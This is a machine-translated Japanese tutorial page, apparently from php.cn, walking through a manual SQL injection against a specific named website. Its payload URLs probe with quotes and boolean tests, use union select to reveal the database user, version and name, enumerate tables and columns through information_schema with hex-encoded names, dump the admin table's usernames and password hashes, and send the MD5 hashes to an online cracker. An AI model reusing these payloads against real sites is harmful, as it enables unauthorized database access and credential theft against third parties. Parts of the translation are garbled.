コミュニティ 学ぶ ツールライブラリ レジャー
検索
日本語
ホームページ > バックエンド開発 > PHPチュートリアル > PHP手動インジェクション

PHP手動インジェクション

WBOY
リリース: 2016-06-23 14:31:31
オリジナル
1233 人が閲覧しました

http://www.rfidcina.org/products/product.php?id=9740

URL の後に ' を追加すると、返されるページにはエラー メッセージなどは表示されませんが、ページにはエラーとコンテンツの欠落です。

次に、 and 1=1 と and 1=2 があり、それぞれ通常の情報と '' ページです。 9740 の前にマイナス記号「-」があります。これには意味がありません。 and 1=2 と同じ効果で、エラーが発生します
http://www.rfidcina.org/products/product.php?id=-9740

次に、union select... 最終的に
http:// を取得します。 www.rfidcina.org/products/product.php?id= -9740+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
こちら2,3,4,5,6,13はすべてページ内にあります

に表示されています スペースと+は同じ効果でスペースが%20になるので+を使うとより見やすくなります。

user() はデータベースに接続するためのユーザー名を取得し、version() はバージョン番号を明らかにし、database() はデータベース名を明らかにします
http://www.rfidcina.org/products/product.php?id=-9740 +union +select+1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14
上記は root@localhost と 5.1 であることが分かりました.24 -rc-log、ビジネス (ライブラリ名)

GROUP_CONCAT() ルックアップ テーブル
http://www.rfidcina.org/trade/trade.php?id=-9740+and+1=2+union+select +1 , 2, group_concat (distinct+table_name),

4,5,6,7,8,11,13,14+from+information_schema.Columns+TABLE_SCHEMA = 0x627573733 696e657373e ?? 0x6275737369657373 はビジネス用の 16 進コードです。しかし何も取得されず、表示ビットさえも表示されません。

代わりに、 or 1=1 または 1=2 を使用してください。
http://www.rfidcina.org/trade/trade.php?id=9740+or+exists(select+*+from+admin)
非常に成功しました 返品されましたまたは 1=1 のときのページに、管理テーブルがあるようです、

それから列名を推測しました、管理は失敗しました、それは「」のときのページでした、ユーザー名をもう一度試しました、それは成功しました
http:// www.rfidcina.org/trade/trade.php?id=9740+or+exists(select+username+from+admin)
情報を見つけるためにオンラインにアクセスして、hex()、unhex() を推測してみましょう。 。そこで私たちは最初のやり方に戻りました。 。 。

http://www.rfidcina.org/trade/trade.php?id=-9740+union+select+1,2,GROUP_CONCAT(DISTINCT+unhex(hex(table_name))),

4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=0x62757373696E657373

これで、すべてのテーブルが公開され、一目で管理テーブルが確認できます。 、 そこにそれがある。


http://www.rfidcina.org/trade/trade.php?id=-9740+union+select+1,2,GROUP_CONCAT(DISTINCT+unhex(hex(column_name))),

4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x61646D696E

最後に確認したのは、ユーザー名、パスワードです。

??0x61646D696E は管理者の 16 進コードです
​​
http://www.rfidcina.org/trade/trade.php?

id=-9740+union+select+1,

GROUP_CONCAT(DISTINCT+username), GROUP_CONCAT (DISTINCT+passwd),

4,5,6,7,8,9,10,11,12,13,14+from+bussiness.admin

ユーザー名フィールドとパスワードが 2 と 3 の表示に表示されますそれぞれのフィールド。

パスワードは md5 で、http://www.md5.com.cn/ で復号化されました。



関連ラベル:
php手工注入
ソース:php.cn
前の記事:PHP と MySQL 入門 (3) 次の記事:PHP と MySQL 入門 (2)
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
最新の問題
アプリケーションのデータベース接続をデコードしています: ヘルプを探しています 私はPhpの初心者で、最近、MySQLとRDSを使用してサーバー(AWS)上で実行され、/ファイルサーバー{server_namemytableで定義されているnginx app/...
から 2024-04-02 12:19:18
0
2
320
phpを使用してカートに追加 製品をカートに追加したいのですが、セッションを使用して新しい製品をカートに追加していますが、データベースで「左結合」を使用すると、手動でコマンドを入力しても結果が返されない理由がわ...
から 2024-04-01 22:48:05
0
1
277
ボタンをアクティブにするとホバー効果が誤動作する 私は Web 開発 (HTML、CSS、JS) の基礎を学ぼうとしているので、動作する Apple 電卓を作ろうとしています。小さなバグに気づくまではすべてが正常に動作していました...
から 2024-04-01 21:51:26
0
1
396
関連トピック
詳細>
人気のおすすめ
人気のチュートリアル
詳細>
関連するチュートリアル
人気のおすすめ
最新のコース
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート